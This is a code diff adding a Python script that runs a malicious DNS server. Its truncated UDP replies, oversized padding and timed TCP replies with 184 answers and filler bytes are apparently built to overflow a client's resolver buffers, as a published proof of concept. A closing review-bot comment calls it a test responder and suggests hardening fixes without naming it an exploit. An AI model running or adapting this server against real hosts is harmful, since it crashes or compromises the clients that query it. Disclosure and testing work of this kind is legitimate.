|
| 1 | +#!/usr/bin/python |
| 2 | +# |
| 3 | +# Copyright 2016 Google Inc |
| 4 | +# |
| 5 | +# Licensed under the Apache License, Version 2.0 (the "License"); |
| 6 | +# you may not use this file except in compliance with the License. |
| 7 | +# You may obtain a copy of the License at |
| 8 | +# |
| 9 | +# http://www.apache.org/licenses/LICENSE-2.0 |
| 10 | +# |
| 11 | +# Unless required by applicable law or agreed to in writing, software |
| 12 | +# distributed under the License is distributed on an "AS IS" BASIS, |
| 13 | +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. |
| 14 | +# See the License for the specific language governing permissions and |
| 15 | +# limitations under the License. |
| 16 | +# |
| 17 | +# Authors: |
| 18 | +# Fermin J. Serna <[email protected]> |
| 19 | +# Gynvael Coldwind <[email protected]> |
| 20 | +# Thomas Garnier <[email protected]> |
| 21 | + |
| 22 | +import socket |
| 23 | +import time |
| 24 | +import struct |
| 25 | +import threading |
| 26 | + |
| 27 | +IP = '127.0.0.1' # Insert your ip for bind() here... |
| 28 | +ANSWERS1 = 184 |
| 29 | + |
| 30 | +terminate = False |
| 31 | +last_reply = None |
| 32 | +reply_now = threading.Event() |
| 33 | + |
| 34 | + |
| 35 | +def dw(x): |
| 36 | + return struct.pack('>H', x) |
| 37 | + |
| 38 | +def dd(x): |
| 39 | + return struct.pack('>I', x) |
| 40 | + |
| 41 | +def dl(x): |
| 42 | + return struct.pack('<Q', x) |
| 43 | + |
| 44 | +def db(x): |
| 45 | + return chr(x) |
| 46 | + |
| 47 | +def udp_thread(): |
| 48 | + global terminate |
| 49 | + |
| 50 | + # Handle UDP requests |
| 51 | + sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) |
| 52 | + sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) |
| 53 | + sock_udp.bind((IP, 53)) |
| 54 | + |
| 55 | + reply_counter = 0 |
| 56 | + counter = -1 |
| 57 | + |
| 58 | + answers = [] |
| 59 | + |
| 60 | + while not terminate: |
| 61 | + data, addr = sock_udp.recvfrom(1024) |
| 62 | + print '[UDP] Total Data len recv ' + str(len(data)) |
| 63 | + id_udp = struct.unpack('>H', data[0:2])[0] |
| 64 | + query_udp = data[12:] |
| 65 | + |
| 66 | + # Send truncated flag... so it retries over TCP |
| 67 | + data = dw(id_udp) # id |
| 68 | + data += dw(0x8380) # flags with truncated set |
| 69 | + data += dw(1) # questions |
| 70 | + data += dw(0) # answers |
| 71 | + data += dw(0) # authoritative |
| 72 | + data += dw(0) # additional |
| 73 | + data += query_udp # question |
| 74 | + data += '\x00' * 2500 # Need a long DNS response to force malloc |
| 75 | + |
| 76 | + answers.append((data, addr)) |
| 77 | + |
| 78 | + if len(answers) != 2: |
| 79 | + continue |
| 80 | + |
| 81 | + counter += 1 |
| 82 | + |
| 83 | + if counter % 4 == 2: |
| 84 | + answers = answers[::-1] |
| 85 | + |
| 86 | + time.sleep(0.01) |
| 87 | + sock_udp.sendto(*answers.pop(0)) |
| 88 | + reply_now.wait() |
| 89 | + sock_udp.sendto(*answers.pop(0)) |
| 90 | + |
| 91 | + sock_udp.close() |
| 92 | + |
| 93 | + |
| 94 | +def tcp_thread(): |
| 95 | + global terminate |
| 96 | + counter = -1 |
| 97 | + |
| 98 | + #Open TCP socket |
| 99 | + sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| 100 | + sock_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) |
| 101 | + sock_tcp.bind((IP, 53)) |
| 102 | + sock_tcp.listen(10) |
| 103 | + |
| 104 | + while not terminate: |
| 105 | + conn, addr = sock_tcp.accept() |
| 106 | + counter += 1 |
| 107 | + print 'Connected with ' + addr[0] + ':' + str(addr[1]) |
| 108 | + |
| 109 | + # Read entire packet |
| 110 | + data = conn.recv(1024) |
| 111 | + print '[TCP] Total Data len recv ' + str(len(data)) |
| 112 | + |
| 113 | + reqlen1 = socket.ntohs(struct.unpack('H', data[0:2])[0]) |
| 114 | + print '[TCP] Request1 len recv ' + str(reqlen1) |
| 115 | + data1 = data[2:2+reqlen1] |
| 116 | + id1 = struct.unpack('>H', data1[0:2])[0] |
| 117 | + query1 = data[12:] |
| 118 | + |
| 119 | + # Do we have an extra request? |
| 120 | + data2 = None |
| 121 | + if len(data) > 2+reqlen1: |
| 122 | + reqlen2 = socket.ntohs(struct.unpack('H', data[2+reqlen1:2+reqlen1+2])[0]) |
| 123 | + print '[TCP] Request2 len recv ' + str(reqlen2) |
| 124 | + data2 = data[2+reqlen1+2:2+reqlen1+2+reqlen2] |
| 125 | + id2 = struct.unpack('>H', data2[0:2])[0] |
| 126 | + query2 = data2[12:] |
| 127 | + |
| 128 | + # Reply them on different packets |
| 129 | + data = '' |
| 130 | + data += dw(id1) # id |
| 131 | + data += dw(0x8180) # flags |
| 132 | + data += dw(1) # questions |
| 133 | + data += dw(ANSWERS1) # answers |
| 134 | + data += dw(0) # authoritative |
| 135 | + data += dw(0) # additional |
| 136 | + data += query1 # question |
| 137 | + |
| 138 | + for i in range(ANSWERS1): |
| 139 | + answer = dw(0xc00c) # name compressed |
| 140 | + answer += dw(1) # type A |
| 141 | + answer += dw(1) # class |
| 142 | + answer += dd(13) # ttl |
| 143 | + answer += dw(4) # data length |
| 144 | + answer += 'D' * 4 # data |
| 145 | + |
| 146 | + data += answer |
| 147 | + |
| 148 | + data1_reply = dw(len(data)) + data |
| 149 | + |
| 150 | + if data2: |
| 151 | + data = '' |
| 152 | + data += dw(id2) |
| 153 | + data += 'B' * (2300) |
| 154 | + data2_reply = dw(len(data)) + data |
| 155 | + else: |
| 156 | + data2_reply = None |
| 157 | + |
| 158 | + reply_now.set() |
| 159 | + time.sleep(0.01) |
| 160 | + conn.sendall(data1_reply) |
| 161 | + time.sleep(0.01) |
| 162 | + if data2: |
| 163 | + conn.sendall(data2_reply) |
| 164 | + |
| 165 | + reply_now.clear() |
| 166 | + |
| 167 | + sock_tcp.shutdown(socket.SHUT_RDWR) |
| 168 | + sock_tcp.close() |
| 169 | + |
| 170 | + |
| 171 | +if __name__ == "__main__": |
| 172 | + |
| 173 | + t = threading.Thread(target=udp_thread) |
| 174 | + t.daemon = True |
| 175 | + t.start() |
| 176 | + tcp_thread() |
| 177 | + terminate = True |
| 178 | + |
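Review bot: In tcp_thread the accepted socket `conn` is never closed, so each pass through the accept loop leaks a descriptor. The buffer from `data = conn.recv(1024)` is also parsed without a length check, so an empty or short read raises `struct.error` at `struct.unpack('H', data[0:2])` and ends the listener. I would add `if len(data) < 14: conn.close(); continue` right after the recv (2-byte length prefix plus 12-byte header) and a `conn.close()` after `reply_now.clear()`. The same unchecked `data[0:2]` unpack is in udp_thread, where one stray datagram shorter than two bytes kills the daemon thread while tcp_thread keeps waiting on `accept()`. A short module docstring would also help anyone running this as a regression check: say that it is a test DNS responder, that it binds port 53 on `IP` for both UDP and TCP, and what client behaviour it expects (a UDP query answered with the truncated flag, then a retry over TCP).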